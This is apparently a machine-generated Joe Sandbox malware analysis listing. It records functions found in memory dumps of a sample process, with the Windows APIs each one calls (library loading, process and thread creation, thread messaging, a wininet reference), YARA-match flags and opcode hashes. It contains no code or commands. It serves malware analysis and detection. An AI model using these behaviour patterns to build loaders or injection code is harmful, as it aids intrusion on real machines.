Opcode Fuzzy Hash: 0b2fa89c877118ccf68d6ec85f897a237098195ae1428f129c47e41596592def
Instruction Fuzzy Hash: 4B900225221404034545E658070490B044597DA751391C419F5407590CC73288656331

Function 031D2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2A8A

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f3b2e4c6046aee9e37d6d729064714aaed9ca1d7f54be3f7490af0e2654ec06d
Instruction ID: c5d4b46cfb61cbcb89af3e0efa0be625f42e2b00f6fa48220301118c4ce4a80e
Opcode Fuzzy Hash: f3b2e4c6046aee9e37d6d729064714aaed9ca1d7f54be3f7490af0e2654ec06d
Instruction Fuzzy Hash: F9900261202404038505B2584614A16400A87E4601B51C425E5005590DC73688917135

Function 031D2AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2ACA

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 545b1f65affb48da1d374f9138f72de9dc609a40d47d8573bca4354c05772259
Instruction ID: 4eb38cfeb786cccf441eb734a83944069222c5fb73f94ecbe265c9f6955fc578
Opcode Fuzzy Hash: 545b1f65affb48da1d374f9138f72de9dc609a40d47d8573bca4354c05772259
Instruction Fuzzy Hash: AE90023160540C03D550B2584614B46000587D4701F51C415A4015654DC7668A5576B1

Function 031D29F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D29FA

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e7288aba7c91f0542541a5d6c28387773359868ec5ddd6f5139963a60a6f923
Instruction ID: 81bf79b46b26a0d1b93ba9820c8127b9cb220f8f6341cf3bb92ec7dc9fcafcad
Opcode Fuzzy Hash: 8e7288aba7c91f0542541a5d6c28387773359868ec5ddd6f5139963a60a6f923
Instruction Fuzzy Hash: 02900435311404034505F75C0704D070047C7DD751351C435F5007550CD733CC717131

Function 031D38D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D38DA

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: daefd364ae60960b8952835c92d27ccf19f5aeaca66a421a25bbdfa90459573d
Instruction ID: 6a74ad56404370b3efe3aeb03f51fc1915d17a40704c2805438c5f0a938cedac
Opcode Fuzzy Hash: daefd364ae60960b8952835c92d27ccf19f5aeaca66a421a25bbdfa90459573d
Instruction Fuzzy Hash: 8690022124545503D550B25C4604A164005A7E4601F51C425A4805594DC76688557231

Function 031D2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2F0A

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4c1117fbf50b5e6250487798b885a6e78bf85aca2e4291b83a93d40515777646
Instruction ID: 37c6fe2575ceba12346aa191a0d8fc75e3369687902aa433da79f7520d483513
Opcode Fuzzy Hash: 4c1117fbf50b5e6250487798b885a6e78bf85aca2e4291b83a93d40515777646
Instruction Fuzzy Hash: 37900221211C0443D600A6684E14F07000587D4703F51C519A4145554CCB2688616531

Function 031D2E00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2E0A

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: da2fa0576e2adef48b607b8aaf4fee97fb5415d897e644280c5145fbf32b2908
Instruction ID: b11ff9675950609cc671a018488288b4ccdf9819bb8d530ea5bd1b3f5f0a8c2a
Opcode Fuzzy Hash: da2fa0576e2adef48b607b8aaf4fee97fb5415d897e644280c5145fbf32b2908
Instruction Fuzzy Hash: 2390026120180803D540A6584A04A07000587D4702F51C415A6055555ECB3A8C517135

Function 031D2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2E5A

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 15c9857db73a4bb2d2c914af20f6c15173544cf9b229611e067d9c7487692cf3
Instruction ID: 023ab21e9473c7bc51acb34c44d6be08d5844d44a55885bfa2127c13e25ba42d
Opcode Fuzzy Hash: 15c9857db73a4bb2d2c914af20f6c15173544cf9b229611e067d9c7487692cf3
Instruction Fuzzy Hash: 4990026134140843D500A2584614F060005C7E5701F51C419E5055554DC72ACC527136

Function 031D2ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2EDA

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9fe8450a6754179604bfcbc3759476bc9f854ac2c53c926520fa2f4d68eb2d7d
Instruction ID: f70b7e7dd274740d89ed2d984d36a63fbf7b97f7e8e624c53756c730977f63e6
Opcode Fuzzy Hash: 9fe8450a6754179604bfcbc3759476bc9f854ac2c53c926520fa2f4d68eb2d7d
Instruction Fuzzy Hash: 27900221601404438540B2688A44D064005ABE5611751C525A4989550DC76A88656675

Function 031D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2D1A

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5a00070d8f030d18efedcf856792c61fe9a4eac7655307da92bc77db9282b5f5
Instruction ID: 3e64ec734505f3de9658c42c1ff48be04a23d045a83809441927c5ea71474a4b
Opcode Fuzzy Hash: 5a00070d8f030d18efedcf856792c61fe9a4eac7655307da92bc77db9282b5f5
Instruction Fuzzy Hash: 3E90023120140813D511A2584704B07000987D4641F91C816A4415558DD7678952B131

Function 031D2DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2DAA

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 12ede481187d18dda64826d1c135a392a2512df7e3aa33b3fc418b63472ddc5e
Instruction ID: 668b6bfa756abb6c92910e42f1cd24f56dc8c086f3e984eba6aab0742e9806f0
Opcode Fuzzy Hash: 12ede481187d18dda64826d1c135a392a2512df7e3aa33b3fc418b63472ddc5e
Instruction Fuzzy Hash: 1290022160140903D501B2584604A16000A87D4641F91C426A5015555ECB368992B131

Function 031D2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2C3A

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f34a3320b2eb738b1944408ab64d7a894eae5d46db54027da58f1e877112311a
Instruction ID: c8a0bf2c982f0489814d181ffd27fcb70a9f2a75f17f95b1e341969073d8f5b1
Opcode Fuzzy Hash: f34a3320b2eb738b1944408ab64d7a894eae5d46db54027da58f1e877112311a
Instruction Fuzzy Hash: 4290022921340403D580B2585608A0A000587D5602F91D819A4006558CCB2688696331

Function 031D2C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2C5A

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efe13453dab82f6638ad3dda73f6e89743c917a90ce4f76a17291ff44d5511ad
Instruction ID: 8a3bd1d381edaa0b7f58e53afca957916407cae13a356ee40b36bfdbc61dd397
Opcode Fuzzy Hash: efe13453dab82f6638ad3dda73f6e89743c917a90ce4f76a17291ff44d5511ad
Instruction Fuzzy Hash: D690022130140403D540B2585618A064005D7E5701F51D415E4405554CDB2688566232

Function 031D2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2CFA

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5fb4c737d41dbc01d9c7d13ab7d0329b014015577d951a2b070172a2e8a8d93d
Instruction ID: 035f5ac092f9ffd460af86ec67027bbe0785a0adda7fbc797262fedd3bf72120
Opcode Fuzzy Hash: 5fb4c737d41dbc01d9c7d13ab7d0329b014015577d951a2b070172a2e8a8d93d
Instruction Fuzzy Hash: 63900221242445539945F2584604907400697E4641791C416A5405950CC7379856E631

Function 028C0961 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(59F79305l7,00000111,00000000,00000000), ref: 028C0A4D

Strings

59F79305l7, xrefs: 028C0A40, 028C0A4C, 028C0A5D
59F79305l7, xrefs: 028C0A54, 028C0A57

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 59F79305l7$59F79305l7
API String ID: 1836367815-429775361
Opcode ID: d595b416d85ee942e89dd0e6382c08f10876ea75a36ec2d375e060830071b789
Instruction ID: 887719c219b4ad75b188ea6efd18750febf470524b0c8254bb6f76681b076811
Opcode Fuzzy Hash: d595b416d85ee942e89dd0e6382c08f10876ea75a36ec2d375e060830071b789
Instruction Fuzzy Hash: 7B219E3D909298B6DB128B78CC41BDEBB74DF42754F1441D9E9816F282C671650BCFD1

Function 028C09C9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(59F79305l7,00000111,00000000,00000000), ref: 028C0A4D

Strings

59F79305l7, xrefs: 028C0A40, 028C0A4C, 028C0A5D
59F79305l7, xrefs: 028C0A54, 028C0A57

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 59F79305l7$59F79305l7
API String ID: 1836367815-429775361
Opcode ID: ce891b242da4febce7806739f86ff1a670220b8b1839c91a35d51be19f4c036b
Instruction ID: 95548ac03d40d812f854d5980d5304dd73b25a52918d6eb3911b05fab5c8b1ca
Opcode Fuzzy Hash: ce891b242da4febce7806739f86ff1a670220b8b1839c91a35d51be19f4c036b
Instruction Fuzzy Hash: 5A112779D00258BADB10AAA48C01FDF7B789F05B50F148158F918BA1C1E7B8A6068BE6

Function 028C09D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(59F79305l7,00000111,00000000,00000000), ref: 028C0A4D

Strings

59F79305l7, xrefs: 028C0A40, 028C0A4C, 028C0A5D
59F79305l7, xrefs: 028C0A54, 028C0A57

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 59F79305l7$59F79305l7
API String ID: 1836367815-429775361
Opcode ID: e1ab62ca10b037a105d6908023dc983e5ccfa0f9c590dba46887f4304e7bd01a
Instruction ID: c709a4dc9653f6030547dd68bb5ccd123d2c75e96030fc399bf6272743abf11d
Opcode Fuzzy Hash: e1ab62ca10b037a105d6908023dc983e5ccfa0f9c590dba46887f4304e7bd01a
Instruction Fuzzy Hash: C101D679D4025CB6EB11AA958C05FDF7B7C9F41B50F158058FA04BB280E7B4A6068BE6

Function 028CF169 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 028CF187
CoUninitialize.COMBASE ref: 028CF26E

Strings

@J7<, xrefs: 028CF19B

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: ffad9bbea92ff435a0aff7d1650c54364e75d6743042e636784b6ad09c76b224
Instruction ID: 71089eae1439f07e4c16eb349dd846ecb519ef1079d379257d9f692f603cca01
Opcode Fuzzy Hash: ffad9bbea92ff435a0aff7d1650c54364e75d6743042e636784b6ad09c76b224
Instruction Fuzzy Hash: 643123B9A006099FDB00DFD8D8809EEB7BAFF88304B108559E515EB254D775EE05CBA1

Function 028CF170 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 028CF187
CoUninitialize.COMBASE ref: 028CF26E

Strings

@J7<, xrefs: 028CF19B

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 1ecde5a9b5691ff378a94e9ec29bb45a3aaede9b90cf72dd79ef350811ca1841
Instruction ID: fc40005f86b5e48f76ca058c06e4cb068c8c03c403983d91433265d4bc125c3f
Opcode Fuzzy Hash: 1ecde5a9b5691ff378a94e9ec29bb45a3aaede9b90cf72dd79ef350811ca1841
Instruction Fuzzy Hash: 763132B9A0060A9FDB00DFD8D8809EFB7BAFF88304F108559E515E7214D775EE058BA0

Function 028D3740 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 028D381B

Strings

wininet.dll, xrefs: 028D37AE, 028D37BA

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: wininet.dll
API String ID: 3472027048-3354682871
Opcode ID: 7858774180f3603e23cc7a215df4bf7952a0b6cdbe6279137b349174b340e2d5
Instruction ID: 7255967f58182fbfeefd9fafdf6d9efbbfc2502c57a8dd1041eaec3bfe95d82d
Opcode Fuzzy Hash: 7858774180f3603e23cc7a215df4bf7952a0b6cdbe6279137b349174b340e2d5
Instruction Fuzzy Hash: 5E31AEB8A01205BBD714DFA4CC84FEBBBB9FB84704F10455DA619AB280D774AA04CFA5

Function 028C4230 Relevance: 1.6, APIs: 1, Instructions: 134libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028C4222

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 7c517d178d7007ee99312d50ed5bccb8a3f1b725f9d2c31633041e2592002b56
Instruction ID: bf4e3c6d082968c66d8055a4e9a68879dd5a4f9f397fc6e9d59ee74f925252a7
Opcode Fuzzy Hash: 7c517d178d7007ee99312d50ed5bccb8a3f1b725f9d2c31633041e2592002b56
Instruction Fuzzy Hash: 5241CD3E50828A6BDB12DB34CCA1EDABF659B02218F2843DCE598CB293D330D149C781

Function 028C41B0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028C4222

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 52126dae7faad31c04decbc127e23bf898b39b7fd04cf1b34f2b8976ffd50565
Instruction ID: 401e9260de25af7804027ac3bffa5528d6ce8c201939ec35513227e0c20404e3
Opcode Fuzzy Hash: 52126dae7faad31c04decbc127e23bf898b39b7fd04cf1b34f2b8976ffd50565
Instruction Fuzzy Hash: 9B011EBDE0020DABDB14DBE4EC41F9DB3799B54308F104199E908E7281F631EB59CB92

Function 028D9440 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,028C7F8E,00000010,?,?,?,00000044,?,00000010,028C7F8E,?,?,?), ref: 028D94A0

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 3022ef5959abcebd927953734864455c98267036362b92df9346a9ef1b8ca6d0
Instruction ID: 06258e41a50db098174e9fb9fb324d3b0e130b90d149829a57148f88aa7f628b
Opcode Fuzzy Hash: 3022ef5959abcebd927953734864455c98267036362b92df9346a9ef1b8ca6d0
Instruction Fuzzy Hash: D101C0B6204508BFCB44DE99DC80EEB77AEAF8C754F118108BA1DE7240D630F8518BA4

Function 028B9A10 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028B9A55

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 627b91f8547528b4b7193ad1d6e897e26f79b9beca334ff1529a3c5c4e877d2f
Instruction ID: 8a65133b9dd6e724f0654d1ae35cb59bcd387bb7f5225522a14e02a32b27afa2
Opcode Fuzzy Hash: 627b91f8547528b4b7193ad1d6e897e26f79b9beca334ff1529a3c5c4e877d2f
Instruction Fuzzy Hash: C6F0657B39021436D320B1AD9C02FE7B74D9F81B61F140025F70CEB2C0D992B4414AA5

Function 028D7F80 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 028D7FC3

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: Path$NameName_
String ID:
API String ID: 3514427675-0
Opcode ID: 1f840870d28e82f17bf599082e488ca25839c3adb52227416b283b86713d387a
Instruction ID: ec6d46d2ca53833e262069affbc603ae0208d285fff12f03bb09cbb3bb3cf4a1
Opcode Fuzzy Hash: 1f840870d28e82f17bf599082e488ca25839c3adb52227416b283b86713d387a
Instruction Fuzzy Hash: 92F015B9200208BBD610EE59DC41FAB77ADEF88720F108419F908A7241C670B9518BF5

Function 028D93B0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,88558D00,00000007,00000000,00000004,00000000,028C3A35,000000F4), ref: 028D93EF

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5b7ec1997cc7bba348007fb009d34e34bc61468facd6fd55fdfdc7a5d4fd4893
Instruction ID: 89467954e510313c7d30a14ead8f6bb5b648cff3b33e4f89d58b4e2a1173019b
Opcode Fuzzy Hash: 5b7ec1997cc7bba348007fb009d34e34bc61468facd6fd55fdfdc7a5d4fd4893
Instruction Fuzzy Hash: EDE06D752042047BC614EE59DC44FEB37ADEF84710F008418F908A7240CA71B8118BB9

Function 028D9360 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(028C1666,?,028D537A,028C1666,028D532E,028D537A,?,028C1666,028D532E,00001000,?,?,00000000), ref: 028D939C

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4ee5dae06c8b689ecf407c44e84c784f67acb8431ce06ff937e2f2b9fcb55efe
Instruction ID: c4a07d04f9b4eb3a036428882427b3c15cdb6122480630b0986b3ddbcc579f00
Opcode Fuzzy Hash: 4ee5dae06c8b689ecf407c44e84c784f67acb8431ce06ff937e2f2b9fcb55efe
Instruction Fuzzy Hash: D0E06D792042047BD614EE59DC40FDB33ADEF88710F108419F918A7240CA70B915CBB9

Function 028C7FD0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 028C7FFC

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1f421d6192210101750f0f48df9c1ea45e295b98ebaee3d927dcc0dc1406becb
Instruction ID: d9f0597be83f0879e65b8e433dfe9497b47a39c6708b093829573e4da7370e28
Opcode Fuzzy Hash: 1f421d6192210101750f0f48df9c1ea45e295b98ebaee3d927dcc0dc1406becb
Instruction Fuzzy Hash: C0E0867D68020427FB24AAA8EC45F7633589B88738F684764F95CEB2C1E7BAF5418550

Function 028C7DB7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,028C1970,028D7C6F,028D532E,028C1936), ref: 028C7DF3

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: fadfa27d49f5d5d248c147b8b9bc2f63ad1fe92d0f7e1f11613b8247fb944d3d
Instruction ID: 6a4631ba6d571fbc6a1181d62a856e420d70c05e84ee3cba9287e794adf07a54
Opcode Fuzzy Hash: fadfa27d49f5d5d248c147b8b9bc2f63ad1fe92d0f7e1f11613b8247fb944d3d
Instruction Fuzzy Hash: F7E0867EA5020436E351F6F48D46F6A334D8F406B1F248764A92DD61C1ED25A4404965

Function 028C7DC0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,028C1970,028D7C6F,028D532E,028C1936), ref: 028C7DF3

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

